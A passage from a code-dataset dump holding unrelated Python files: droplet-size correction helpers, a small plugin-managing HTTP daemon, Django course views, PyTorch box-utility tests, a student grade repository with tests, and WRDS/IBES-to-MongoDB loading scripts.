If yes\n todict is called to change them to nested dictionaries\n '''\n for key in dict:\n if isinstance(dict[key], sio.matlab.mio5_params.mat_struct):\n dict[key] = _todict(dict[key])\n return dict \n#__________________________________________________________________________________________________\n\ndef _todict(matobj):\n '''\n A recursive function which constructs from matobjects nested dictionaries\n '''\n dict = {}\n for strg in matobj._fieldnames:\n elem = matobj.__dict__[strg]\n if isinstance(elem, sio.matlab.mio5_params.mat_struct):\n dict[strg] = _todict(elem)\n else:\n dict[strg] = elem\n return dict\n\n\n\n#print_mat_nested(matdata, nkeys=6)\n\n#__________________________________________________________________________________________________\n\ndef Matlab2PythonTime(matlab_datenum):\n python_datetime = datetime.datetime.fromordinal(int(matlab_datenum)) + datetime.timedelta(days=matlab_datenum%1) - datetime.timedelta(days = 366)\n return python_datetime\n\n#__________________________________________________________________________________________________\n\ndef Matlab2PythonTimeArray(matlab_datenum_array):\n F_array = np.vectorize(Matlab2PythonTime)\n PythonTimeArray=F_array(matlab_datenum_array)\n\n return PythonTimeArray\n\n#__________________________________________________________________________________________________\n\n#plt.xlim(['2018-02-13 06:35:00','2018-02-13 06:36:00'])\n\n\ndef TimeSeriesPlot(TimeArray, YArray, TimeStart, TimeEnd, Ymin, Ymax):\n \n \n fig=plt.figure(figsize=(10,5)) \n plt.rcParams.update({'font.size': 10})\n formatter = DateFormatter('%H:%M')\n \n plt.subplot(1, 1, 1)\n #plt.title(FlightNumber)\n \n plt.plot(TimeArray, YArray)\n \n plt.gca().xaxis.set_major_locator(mdates.HourLocator() )\n plt.gca().xaxis.set_minor_locator(mdates.MinuteLocator(30) )\n plt.gcf().axes[0].xaxis.set_major_formatter(formatter)\n plt.xlabel('time') \n #plt.xlim(['2018-02-13 06:35:00','2018-02-13 06:36:00'])\n plt.xlim([TimeStart,TimeEnd])\n plt.ylim([Ymin, Ymax])\n\n\n#__________________________________________________________________________________________________\n\n#Diameter correction from Reuter and Bakan 1997\n\ndef ReuterBakanDiameter(Diameter25,AreaFraction0): \n\n C = 0.962\n D = -10.34\n E = 1.444 \n F = 7.036\n \n D_ReuterBakan=np.zeros(len(Diameter25))*np.nan\n for i in range(len(Diameter25)) :\n #D_ReuterBakan[i] = (C*Diameter25[i] + D) * AreaFraction0[i] + (E*Diameter[i] + F)\n D_ReuterBakan[i] = (Diameter25[i] - D - F*AreaFraction0[i]) / (E*AreaFraction0[i] + C)\n \n return D_ReuterBakan\n\n\n\n\n#_______________________________________________________________________________________ \n\n\n \ndef KorolevCorrectedD(FilledArea, VoidArea,Diameter):\n \n CorrFactArray=np.empty(len(Diameter), dtype=float)\n Dspot_Dmax, Dmax_D0=GetKorolevRatios()\n for i in range(len(Diameter)):\n CorrFactArray[i]=KorolevCorrection(Dspot_Dmax, Dmax_D0,VoidArea[i],FilledArea[i])\n \n D_KorolevCorr=Diameter*CorrFactArray\n \n return D_KorolevCorr\n#_______________________________________________________________________________________ \n \n \ndef KorolevCorrection(Dspot_Dmax, Dmax_D0,VoidAreaElement,FilledAreaElement): \n #KorolevRatios= KorolevCorrection()\n #KorolevRatiosArray=KorolevRatios.values\n #Dspot_Dmax=KorolevRatiosArray[:,3]\n #Dmax_D0=KorolevRatiosArray[:,1]\n if VoidAreaElement>0 and FilledAreaElement>0:\n scaleF = 4/math.pi\n PixelRatio = math.sqrt(VoidAreaElement*scaleF)/math.sqrt(FilledAreaElement*scaleF)\n pos=(np.abs(Dspot_Dmax-PixelRatio)).argmin()\n CorrFac 
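# Aside (editorial, not part of the original module): the lookup used here,
# (np.abs(table - x)).argmin(), is a linear nearest-neighbour scan; if the
# Korolev ratio table in the CSV is sorted, np.searchsorted plus one
# neighbour comparison finds the same entry in O(log n).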
= 1/Dmax_D0[pos]\n else:\n CorrFac=1\n \n return CorrFac\n #pos = binarysearchinterp(Dspot_Dmax,pixelRatio)\n#_______________________________________________________________________________________ \n\ndef GetKorolevRatios():\n KorolevRatios = pd.read_csv('C:/Users/Admin TEMP/Documents/DropletGun/Korolev07_ratios.csv')\n KorolevRatiosArray=KorolevRatios.values\n Dspot_Dmax=KorolevRatiosArray[:,3]\n Dmax_D0=KorolevRatiosArray[:,1]\n \n return Dspot_Dmax, Dmax_D0 \n\n#_________________________________________________________________________________________________ \n\ndef GetKorolevRatios_Zd():\n KorolevRatios = pd.read_csv('C:/Users/Admin TEMP/Documents/DropletGun/Korolev07_ratios_withZd.csv')\n KorolevRatiosArray=KorolevRatios.values\n \n Z_d=KorolevRatiosArray[:,0]\n Dspot_Dmax=KorolevRatiosArray[:,1]\n Dspot_Dimg=KorolevRatiosArray[:,2]\n Dmax_D0=KorolevRatiosArray[:,3]\n Dimg_Dmax=KorolevRatiosArray[:,4]\n \n return Z_d,Dspot_Dmax,Dspot_Dimg,Dmax_D0,Dimg_Dmax\n\n\n#_______________________________________________________________________________________ \n \n\n# correction factor for diameter derived from areafraction2 \n \ndef Level2_D_Correction_vector(Diameter, AreaFraction2,VoidRatio) :\n \n CorrFactArray=np.empty(len(Diameter), dtype=float)\n Z_d,Dspot_Dmax,Dspot_Dimg,Dmax_D0,Dimg_Dmax= GetKorolevRatios_Zd()\n \n for i in range(len(Diameter)):\n CorrFactArray[i]=Level2_D_Correction(Z_d, Dmax_D0, AreaFraction2[i],VoidRatio[i])\n \n D_AreaFraction2Corr=Diameter*CorrFactArray\n \n return D_AreaFraction2Corr\n#_______________________________________________________________________________________ \n \n \n \ndef Level2_D_Correction(LookUp_Zd,Dmax_D0, AreaFraction2, VoidRatio): \n\n a= 1.02254\n b= -1.08683\n c= 0.840135\n \n #LookUp_areafraction2= a*LookUp_Zd**2 + b*LookUp_Zd + c \n LookUp_areafraction2=(np.where(LookUp_Zd<0.5,a*LookUp_Zd**2 + b*LookUp_Zd + c,0))\n \n \n if AreaFraction2 > 0.55 and AreaFraction2 < 0.8 and VoidRatio == 0 :\n pos=(np.abs(LookUp_areafraction2-AreaFraction2)).argmin()\n CorrFac = 1/Dmax_D0[pos]\n else:\n CorrFac=1\n \n return CorrFac\n\n#_______________________________________________________________________________________ \n\n\n\n\n","sub_path":"Old/MyFunctions07092018.py","file_name":"MyFunctions07092018.py","file_ext":"py","file_size_in_byte":23191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"157016734","text":"from threading import Thread\r\nfrom http.server import HTTPServer\r\nfrom core.server.HTTPRequestHandler import HTTPRequestHandler\r\nimport requests\r\n\r\nclass DaemonServer():\r\n \"\"\"\r\n The DaemonServer is a minimalist http server that will allow interface\r\n to manage the daemon.\r\n \"\"\"\r\n\r\n _user = {}\r\n _is_log = False\r\n\r\n def __init__(self, daemon, base_url):\r\n \"\"\"\r\n Initializer\r\n\r\n @param daemon: a reference to the daemon object\r\n @type daemon: Daemon\r\n @param base_url: the API URL\r\n @type base_url: string\r\n \"\"\"\r\n self._is_running = False\r\n self._httpd = None\r\n self._th = None\r\n DaemonServer._daemon = daemon\r\n DaemonServer._base_url = base_url\r\n DaemonServer._mock_url = \"http://127.0.0.1:3000\"\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/')\r\n def index(request):\r\n \"\"\"\r\n This URL is a test to be sure that the DaemonServer can handle a request\r\n \"\"\"\r\n return requests.get(DaemonServer._mock_url + '/')\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.post('/login')\r\n def post_user_login(request):\r\n 
\"\"\"\r\n Login\r\n \"\"\"\r\n data = {'email': request.fields['email'], 'password': request.fields['password']}\r\n res = requests.post(DaemonServer._base_url + '/user/login.json', data=data)\r\n if res.ok:\r\n DaemonServer._is_log = True\r\n DaemonServer._user['_token'] = res.json()['data']\r\n DaemonServer._user['_email'] = request.fields['email'][0]\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/logout')\r\n def get_user_logout(request):\r\n \"\"\"\r\n Logout\r\n \"\"\"\r\n auth = (DaemonServer._user['_email'], DaemonServer._user['_token'])\r\n res = requests.get(DaemonServer._base_url + '/user/logout.json', auth=auth)\r\n if res.ok:\r\n DaemonServer._is_log = False\r\n DaemonServer._token = None\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/me')\r\n def get_user_me(request):\r\n \"\"\"\r\n Informations about the user\r\n \"\"\"\r\n auth = (DaemonServer._user['_email'], DaemonServer._user['_token'])\r\n res = requests.get(DaemonServer._base_url + '/user/me.json', auth=auth)\r\n return res\r\n\r\n # mock\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/')\r\n def get_plugins(request):\r\n \"\"\"\r\n List of all plugins\r\n \"\"\"\r\n res = requests.get(DaemonServer._mock_url + '/plugins')\r\n return res\r\n\r\n # mock\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:id')\r\n def get_plugin(request):\r\n \"\"\"\r\n Get a specific plugin\r\n\r\n Url param:\r\n id -> plugin ID\r\n \"\"\"\r\n res = requests.get(DaemonServer._mock_url + '/plugins/' + request.url_vars['id'])\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:author/:plugin_name/download')\r\n def get_download_plugin(request):\r\n \"\"\"\r\n Download a plugin\r\n\r\n Url param:\r\n author -> the plugin's author\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n auth = (DaemonServer._user['_email'], DaemonServer._user['_token'])\r\n res = requests.get(DaemonServer._base_url + '/plugins/' + request.url_vars['author'] + '/' + request.url_vars['plugin_name'] + '/download', auth=auth)\r\n if res.ok:\r\n download_url = res.json()['url']\r\n download_path = DaemonServer._daemon._config.get('plugin_folder_download')\r\n download_path = DaemonServer._daemon._config.resolve_path_from_root(download_path, request.url_vars['plugin_name'])\r\n DaemonServer.__download_file(download_path, download_url, extension='.zip')\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:plugin_name/install')\r\n def get_install_plugin(request):\r\n \"\"\"\r\n Install a plugin\r\n\r\n Url param:\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n plugin_path = DaemonServer._daemon._config.get('plugin_folder_download')\r\n plugin_path = DaemonServer._daemon._config.resolve_path_from_root(plugin_path, request.url_vars['plugin_name'] + '.zip')\r\n res = requests.Response()\r\n DaemonServer._daemon.install_plugin(plugin_path)\r\n res.status_code = 200\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.delete('/plugins/:plugin_name')\r\n def delete_uninstall_plugin(request):\r\n \"\"\"\r\n Uninstall a plugin\r\n\r\n Url param:\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n plugin_name = request.url_vars['plugin_name']\r\n res = requests.Response()\r\n DaemonServer._daemon.uninstall_plugin(plugin_name)\r\n res.status_code = 200\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:plugin_name/enable')\r\n def get_enable_plugin(request):\r\n \"\"\"\r\n Enable a plugin\r\n\r\n Url param:\r\n plugin_name -> the plugin's 
name\r\n \"\"\"\r\n plugin_name = request.url_vars['plugin_name']\r\n res = requests.Response()\r\n if DaemonServer._daemon.enable_plugin(plugin_name):\r\n res.status_code = 200\r\n else:\r\n res.status_code = 400\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:plugin_name/disable')\r\n def get_disable_plugin(request):\r\n \"\"\"\r\n Disable a plugin\r\n\r\n Url param:\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n plugin_name = request.url_vars['plugin_name']\r\n res = requests.Response()\r\n if DaemonServer._daemon.disable_plugin(plugin_name):\r\n res.status_code = 200\r\n else:\r\n res.status_code = 400\r\n return res\r\n\r\n @staticmethod\r\n def __download_file(file_path, url, extension=''):\r\n \"\"\"\r\n Private method allowing to download a file and save it on specified path\r\n\r\n @param file_path: the local path where the file will be saved\r\n @type file_path: string\r\n @param url: the url allownig the download\r\n @type url: string\r\n @param extension: extension of the local file\r\n @type extension: string\r\n \"\"\"\r\n auth = (DaemonServer._user['_email'], DaemonServer._user['_token'])\r\n res = requests.get(DaemonServer._base_url + url, auth=auth, stream=True)\r\n with open(file_path + extension, 'wb') as dfile:\r\n for chunk in res.iter_content(chunk_size=1024):\r\n if chunk:\r\n dfile.write(chunk)\r\n\r\n def run(self, adress='127.0.0.1', port=8001):\r\n \"\"\"\r\n Start the DaemonServer by listening on the specified adress\r\n\r\n @param adress: adress to listen on\r\n @type adress: string\r\n @param port: port to listen on\r\n @type port: int\r\n \"\"\"\r\n self._httpd = HTTPServer((adress, port), HTTPRequestHandler)\r\n self._is_running = True\r\n self._th = Thread(None, self._httpd.serve_forever)\r\n self._th.start()\r\n print('DaemonServer is listening on %s:%d' % (adress, port))\r\n\r\n def stop(self):\r\n \"\"\"\r\n Stop the DaemonServer\r\n \"\"\"\r\n print('Stopping the DaemonServer...')\r\n self._httpd.shutdown()\r\n self._th.join()\r\n self._is_running = False\r\n","sub_path":"core/server/DaemonServer.py","file_name":"DaemonServer.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"589401280","text":"from django.shortcuts import render, redirect\nfrom .models import Course\n\n# Create your views here.\ndef index(request):\n context = {\n 'courses': Course.objects.all()\n }\n return render(request, 'course/index.html', context)\n\ndef add_course(request):\n if request.method == 'POST':\n Course.objects.create(course_name=request.POST['course_name'], description=request.POST['description'])\n return redirect('/')\n\ndef prompt_destroy(request, course_id):\n context = {\n 'course': Course.objects.get(id=course_id)\n }\n return render(request, 'course/destroy.html', context)\n\ndef destroy(request, course_id):\n if request.method == 'POST':\n Course.objects.filter(id=course_id).delete()\n return redirect('/')\n","sub_path":"Python/Flask-MySQL-Python/Django/courses/apps/course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"228652784","text":"import torch\nimport pytest\nimport pytorch_tools as pt\n\n\ndef random_boxes(mean_box, stdev, N):\n return torch.rand(N, 4) * stdev + torch.tensor(mean_box, dtype=torch.float)\n\n\n# fmt: off\nDEVICE_DTYPE = [\n (\"cpu\", torch.float), \n (\"cuda\", torch.float), \n 
(\"cuda\", torch.half)\n]\n# fmt: on\n# check that it works for all combinations of dtype and device\n@pytest.mark.parametrize(\"device_dtype\", DEVICE_DTYPE)\ndef test_clip_bboxes(device_dtype):\n device, dtype = device_dtype\n # fmt: off\n bboxes = torch.tensor(\n [\n [-5, -10, 50, 100],\n [10, 15, 20, 25],\n ],\n device=device,\n dtype=dtype,\n )\n expected_bboxes = torch.tensor(\n [\n [0, 0, 40, 60],\n [10, 15, 20, 25],\n ],\n device=device,\n dtype=dtype,\n )\n # fmt: on\n size = (60, 40)\n # test single bbox clip\n res1 = pt.utils.box.clip_bboxes(bboxes, size)\n assert torch.allclose(res1, expected_bboxes)\n # test single bbox clip passing torch.Size\n res2 = pt.utils.box.clip_bboxes(bboxes, torch.Size(size))\n assert torch.allclose(res2, expected_bboxes)\n\n BS = 4\n batch_bboxes = bboxes.unsqueeze(0).expand(BS, -1, -1)\n batch_expected = expected_bboxes.unsqueeze(0).expand(BS, -1, -1)\n batch_sizes = torch.tensor(size).repeat(BS, 1)\n # test batch clipping\n res3 = pt.utils.box.clip_bboxes_batch(batch_bboxes.clone(), batch_sizes)\n assert torch.allclose(res3, batch_expected)\n\n # check that even in batch mode we can pass single size\n res4 = pt.utils.box.clip_bboxes_batch(batch_bboxes.clone(), torch.tensor(size))\n assert torch.allclose(res4, batch_expected)\n\n jit_clip = torch.jit.script(pt.utils.box.clip_bboxes_batch)\n # check that function is JIT script friendly\n res5 = jit_clip(batch_bboxes.clone(), batch_sizes)\n assert torch.allclose(res5, batch_expected)\n\n\n@pytest.mark.parametrize(\"device_dtype\", DEVICE_DTYPE)\ndef test_delta2box(device_dtype):\n device, dtype = device_dtype\n # fmt: off\n anchors = torch.tensor(\n [\n [ 0., 0., 1., 1.],\n [ 0., 0., 1., 1.],\n [ 0., 0., 1., 1.],\n [ 5., 5., 5., 5.]\n ],\n device=device,\n dtype=dtype,\n )\n deltas = torch.tensor(\n [\n [ 0., 0., 0., 0.],\n [ 1., 1., 1., 1.],\n [ 0., 0., 2., -1.],\n [ 0.7, -1.9, -0.5, 0.3]\n ],\n device=device,\n dtype=dtype,\n )\n # by default we don't expect results to be clipped\n expected_res = torch.tensor(\n [\n [0.0000, 0.0000, 1.0000, 1.0000],\n [0.1409, 0.1409, 2.8591, 2.8591],\n [-3.1945, 0.3161, 4.1945, 0.6839],\n [5.0000, 5.0000, 5.0000, 5.0000],\n ],\n device=device,\n dtype=dtype,\n )\n # fmt: on\n res1 = pt.utils.box.delta2box(deltas, anchors)\n assert torch.allclose(res1, expected_res, atol=3e-4)\n\n BS = 4\n batch_anchors = anchors.unsqueeze(0).expand(BS, -1, -1)\n batch_deltas = deltas.unsqueeze(0).expand(BS, -1, -1)\n batch_expected = expected_res.unsqueeze(0).expand(BS, -1, -1)\n\n # test applying to batch\n res2 = pt.utils.box.delta2box(batch_deltas.clone(), batch_anchors)\n assert torch.allclose(res2, batch_expected, atol=3e-4)\n\n # check that function is JIT script friendly\n jit_func = torch.jit.script(pt.utils.box.delta2box)\n res3 = jit_func(batch_deltas.clone(), batch_anchors)\n assert torch.allclose(res3, batch_expected, atol=3e-4)\n\n\n@pytest.mark.parametrize(\"device_dtype\", DEVICE_DTYPE)\ndef test_box2delta(device_dtype):\n ## this test only checks that encoding and decoding gives the same result\n device, dtype = device_dtype\n boxes = random_boxes([10, 10, 20, 20], 10, 10).to(device).to(dtype)\n anchors = random_boxes([10, 10, 20, 20], 10, 10).to(device).to(dtype)\n deltas = pt.utils.box.box2delta(boxes, anchors)\n boxes_reconstructed = pt.utils.box.delta2box(deltas, anchors)\n atol = 2e-2 if dtype == torch.half else 1e-6 # for fp16 sometimes error is large\n assert torch.allclose(boxes, boxes_reconstructed, atol=atol)\n\n # check that it's jit friendly\n 
jit_box2delta = torch.jit.script(pt.utils.box.box2delta)\n jit_delta2box = torch.jit.script(pt.utils.box.delta2box)\n deltas2 = jit_box2delta(boxes, anchors)\n boxes_reconstructed2 = jit_delta2box(deltas2, anchors)\n assert torch.allclose(boxes, boxes_reconstructed2, atol=atol)\n","sub_path":"tests/utils/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"614005621","text":"import sys\nsys.path.append('..')\nfrom Domain.grade import *\nfrom Domain.assignment import *\nfrom Domain.student import *\nfrom Repositories.studentRepo import *\nfrom dataStruct.DataStruct import *\nimport datetime\nimport unittest\n\nclass GradeRepository:\n def __init__(self):\n self._gList = DataStruct()\n def store(self, grade):\n self._gList.append(grade)\n def get_grade_list(self):\n return self._gList.getList()\n def get_specific_grade(self, sID, aID):\n lst = self._gList.getList()\n for grade in lst:\n if(grade.get_student() == sID and grade.get_assignment() == aID):\n return grade._grade\n def get_student_grades(self, sID):\n lst = self._gList.getList()\n gL = []\n for grade in lst:\n if(grade.get_student() == sID):\n gL.append(grade)\n return gL\n def get_assignment_grades(self, aID):\n lst = self._gList.getList()\n gL = []\n for grade in lst:\n if(grade.get_assignment() == aID):\n gL.append(grade)\n return gL\n def get_student_average(self, sID):\n total = 0\n avg = 0\n nr = 0\n if(self.isStudent(sID)):\n for grade in self._gList.getList():\n if(grade.get_student() == sID):\n total += grade.get_grade()\n nr += 1\n avg = total/nr\n return avg\n def get_assignment_average(self, aID):\n total = 0\n avg = 0\n nr = 0\n for grade in self._gList.getList():\n if(grade.get_assignment() == aID):\n total += grade.get_grade()\n nr += 1\n avg = total/nr\n return avg\n def isAssignment(self, aID):\n lst = self.get_grade_list()\n for i in range(0, len(lst)):\n if(lst[i].get_assignment() == aID):\n return True\n return False\n def isStudent(self, sID):\n lst = self.get_grade_list()\n for grade in lst:\n if(grade.get_student() == sID):\n return True\n return False\n def delete_assignment_grading(self, aID):\n lst = self.get_grade_list()\n while(self.isAssignment(aID)):\n for i in range(0, len(lst)):\n if(lst[i].get_assignment() == aID):\n del lst[i]\n break\n def delete_student_grading(self, sID):\n lst = self.get_grade_list()\n while(self.isStudent(sID)):\n for i in range(0, len(lst)):\n if(lst[i].get_student() == sID):\n del lst[i]\n break\n def delete_specific_grade(self, sID, aID):\n lst = self._gList.getList()\n for i in range(0, len(lst)):\n if(lst[i].get_student() == sID and lst[i].get_assignment() == aID):\n del lst[i]\n break\n def isGraded(self, sID, aID):\n lst = self.get_grade_list()\n for grade in lst:\n if(grade.get_student() == sID and grade.get_assignment() == aID):\n return True\n return False\n #SORT HERE\n def gradedAssignments(self, asgnList):\n lst = []\n for assignment in asgnList:\n if(self.isAssignment(assignment.getID()) == True):\n avg = self.get_assignment_average(assignment.getID())\n lst.append((assignment.getID(), avg))\n for i in range(0, len(lst)-1):\n for j in range(i+1, len(lst)):\n if(lst[i][1] < lst[j][1]):\n aux = lst[i]\n lst[i] = lst[j]\n lst[j] = aux\n return lst\n #SORT HERE\n def students_by_average(self, studentRepo, aID):\n lst = []\n sRepo = studentRepo\n sList = sRepo.get_student_list()\n newList = []\n for student in sList:\n if(aID in 
student.getAssignmentList()):\n lst.append(student)\n for student in lst:\n avg = self.get_student_average(student.getID())\n if(avg != 0):\n newList.append((student, avg))\n for i in range(0, len(sList)-1):\n for j in range(i+1, len(newList)):\n if(newList[i][1] < newList[j][1]):\n aux = newList[i]\n newList[i] = newList[j]\n newList[j] = aux\n return newList\n def student_alphabetical(self, studentRepo, aID):\n lst = []\n sRepo = studentRepo\n sList = sRepo.get_student_list()\n newList = []\n for student in sList:\n if(aID in student.getAssignmentList()):\n lst.append(student)\n for student in lst:\n avg = self.get_student_average(student.getID())\n if(avg != 0):\n newList.append((student, avg))\n for i in range(0, len(newList)-1):\n for j in range(i+1, len(newList)):\n if(newList[i][0].getName() > newList[j][0].getName()):\n aux = newList[i]\n newList[i] = newList[j]\n newList[j] = aux\n return newList\n def isLate(self, student):\n lst = student.getAssignmentList()\n sID = student.getID()\n for asgn in lst:\n if(not self.isGraded(sID, asgn)):\n return True\n print(\"LATE!\")\n return False\n def get_late_students(self, sList):\n lst = self.get_grade_list()\n lateList = []\n for i in range(0, len(sList)):\n student = sList[i]\n assignments = sList[i].getAssignmentList()\n for j in range(0 ,len(assignments)):\n if((not self.isGraded(student.getID(), assignments[j])) and self.isLate(student)):\n lateList.append((student, assignments[j]))\n return lateList\n #SORT HERE\n def sort_students_by_grade(self, studentRepo):\n sRepo = studentRepo\n sList = sRepo.get_student_list()\n newList = []\n for student in sList:\n avg = self.get_student_average(student.getID())\n newList.append((student, avg))\n for i in range(0, len(newList)-1):\n for j in range(i+1, len(newList)):\n if(newList[i][1] < newList[j][1]):\n aux = newList[i]\n newList[i] = newList[j]\n newList[j] = aux\n return newList\n def sort_assignments_by_average(self, asgnRepo):\n aRepo = asgnRepo\n aList = aRepo.getAssignmentList()\n newList = []\n for assignment in aList:\n avg = self.get_assignment_average(assignment.getID())\n newList.append((assignment, avg))\n for i in range(0, len(newList)-1):\n for j in range(i+1, len(newList)):\n if(newList[i][1] < newList[j][1]):\n aux = newList[i]\n newList[i] = newList[j]\n newList[j] = aux\n return newList\nclass TestGrade(unittest.TestCase):\n def setUp(self):\n self.gRepo = GradeRepository()\n self.g1 = Grade(12, \"A1\", 10, datetime.date(2017, 12, 1))\n self.g2 = Grade(12, \"A2\", 8, datetime.date(2017, 11, 2))\n self.g3 = Grade(13, \"A1\", 8, datetime.date(2017, 10, 23))\n self.gRepo.store(self.g1)\n self.gRepo.store(self.g2)\n self.gRepo.store(self.g3)\n def test_store(self):\n self.gRepo.store(self.g1)\n self.assertEqual(self.gRepo._gList, [self.g1, self.g2, self.g3, self.g1])\n self.assertNotEqual(self.gRepo._gList, [])\n def test_get(self):\n self.assertEqual(self.gRepo.get_grade_list(), [self.g1, self.g2, self.g3])\n self.assertEqual(self.gRepo.get_specific_grade(12, \"A1\"), 10)\n self.assertEqual(self.gRepo.get_student_average(12), 9.0)\n self.assertEqual(self.gRepo.get_assignment_average(\"A1\"), 9)\n def test_isAssignment(self):\n self.assertTrue(self.gRepo.isAssignment(\"A1\"))\n self.assertFalse(self.gRepo.isAssignment(\"A3\"))\n def test_isStudent(self):\n self.assertTrue(self.gRepo.isStudent(12))\n self.assertFalse(self.gRepo.isAssignment(24))\n def test_isGraded(self):\n self.assertTrue(self.gRepo.isGraded(12, \"A1\"))\n self.assertFalse(self.gRepo.isGraded(13, \"A2\"))\n 
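# Aside (editorial, not part of the original test case): unittest re-runs
# setUp before every test method, so the deletions exercised in
# test_deletion below start from a fresh three-grade repository rather than
# inheriting whatever state test_store left behind.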
def test_deletion(self):\n self.gRepo.delete_student_grading(12)\n self.assertEqual(self.gRepo.get_grade_list(), [self.g3])\n self.gRepo.store(self.g1)\n self.gRepo.store(self.g2)\n self.gRepo.delete_assignment_grading(\"A1\")\n self.assertEqual(self.gRepo.get_grade_list(), [self.g2])\n self.gRepo.store(self.g1)\n self.gRepo.store(self.g3)\n self.gRepo.delete_specific_grade(12, \"A1\")\n self.assertEqual(self.gRepo.get_grade_list(), [self.g2, self.g3])\n def test_gradedAssignments(self):\n a1 = Assignment(\"A1\", \"Lorem\", datetime.date(2017, 12, 1))\n a2 = Assignment(\"A2\", \"Ipsum\", datetime.date(2017, 11, 12))\n self.assertEqual(self.gRepo.gradedAssignments([a1, a2]), [(\"A1\", 9), (\"A2\", 8)])\n def test_sortAvg(self):\n sRepo = StudentRepo()\n s1 = Student(12, \"Darjan\", \"912\")\n s2 = Student(13, \"Andrei\", \"912\")\n sRepo.store(s1)\n sRepo.store(s2)\n lst = self.gRepo.students_by_average(sRepo, \"A1\")\n self.assertEqual(lst, [])\n def test_getSG(self):\n self.assertEqual(self.gRepo.get_student_grades(12), [self.g1, self.g2])\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"Repositories/gradeRepo.py","file_name":"gradeRepo.py","file_ext":"py","file_size_in_byte":9510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"86527068","text":"__author__ = 'pougomg'\n\nimport motor\nimport tornado\nimport numpy as np\nimport pandas as pd\nimport wrds\nfrom pymongo import UpdateOne\nfrom bson.objectid import ObjectId\n\nfrom aBlackFireCapitalClass.ClassPriceRecommendationData.ClassPriceRecommendationDataInfos import \\\n PriceTargetAndconsensusInfosData\nfrom zBlackFireCapitalImportantFunctions.SetGlobalsFunctions import type_consensus, type_price_target\n\n\ndef SetStocksInfosRecommendationsInDB(type, connectionstring):\n\n \"\"\"\n This function set all the Stocks Recommendations Infos in the DB.\n :param:\n type: price_target/consensus DB\n connectionstring. 
The DB location where the data will be store.\n\n \"\"\"\n\n if type == type_consensus:\n db = wrds.Connection()\n res = db.raw_sql(\"select a.cusip, a.ticker from ibes.recddet a group by a.cusip, a.ticker\")\n db.close()\n elif type == type_price_target:\n db = wrds.Connection()\n res = db.raw_sql(\"select a.cusip, a.ticker from ibes.ptgdet a group by a.cusip, a.ticker\")\n db.close()\n else:\n error = \"Incorrection Argument Type It must be {} or {}.\"\n raise TypeError(error.format(type_price_target, type_consensus))\n\n dict_infos = dict()\n for pos in range(res.shape[0]):\n cusip = res['cusip'][pos]\n ticker = res['ticker'][pos]\n\n if cusip is None:\n cusip = ticker\n\n dict_infos[(cusip, ticker)] = {'ticker': ticker, 'cusip': cusip}\n\n if (cusip != ticker):\n if dict_infos.get((ticker, ticker), False):\n del dict_infos[(ticker, ticker)]\n data = []\n for key in dict_infos:\n data.append(dict_infos[key])\n ClientDB = motor.motor_tornado.MotorClient(connectionstring)\n tornado.ioloop.IOLoop.current().run_sync(PriceTargetAndconsensusInfosData(ClientDB,type,data).SetInfosInDB)\n ClientDB.close()\n\n\ndef BulkSetData(_id, gvkey):\n\n return UpdateOne({\"_id\":ObjectId(_id)},{\"$set\":{\"gvkey\":gvkey}})\n\n\ndef SetGvkeyToInfosRecommendations(type_, connectionstring):\n\n \"\"\"This function is used to assign a GVKEY for the stocks Infos for Recommendations\"\"\"\n # tabStocksInFosGvkey = []\n # for value in StocksInFosGvkeyList:\n # tabStocksInFosGvkey.append([value[\"_id\"], value['cusip'], value['ticker']])\n\n\n tabStocksInfosGvkey = np.load('tabStocksInFosGvkey.npy')\n\n tabStocksRecommendationInfos = np.load('tabStocksConsensusInfos.npy')\n\n tabStocksInfosGvkey = pd.DataFrame(tabStocksInfosGvkey, columns=['gvkey', 'cusip', 'ticker'])\n\n tabStocksRecommendationInfos = pd.DataFrame(tabStocksRecommendationInfos, columns=['_id', 'cusip', 'ticker'])\n\n CusipFilterTab = tabStocksRecommendationInfos[tabStocksRecommendationInfos['cusip'] != None]\n\n\n CusipFilterTab = pd.merge(CusipFilterTab, tabStocksInfosGvkey, on='cusip')[['_id', 'gvkey']].set_index('_id')\n\n TickerFilterTab = tabStocksRecommendationInfos[tabStocksRecommendationInfos['ticker'] != None]\n TickerFilterTab = pd.merge(TickerFilterTab, tabStocksInfosGvkey, on='ticker')[['_id', 'gvkey']].set_index('_id')\n\n\n\n tabResult = pd.concat([TickerFilterTab, CusipFilterTab]).reset_index().drop_duplicates('_id')\n v = np.vectorize(BulkSetData)\n tabResult['data'] = v(tabResult['_id'], tabResult['gvkey'])\n print(tabResult[tabResult.gvkey == '062634'])\n\n data = list(tabResult['data'].values)\n ClientDB = motor.motor_tornado.MotorClient(connectionstring)\n tornado.\\\n ioloop.IOLoop.current().\\\n run_sync(PriceTargetAndconsensusInfosData(ClientDB,type_, data).SetInfosInDB)\n\n 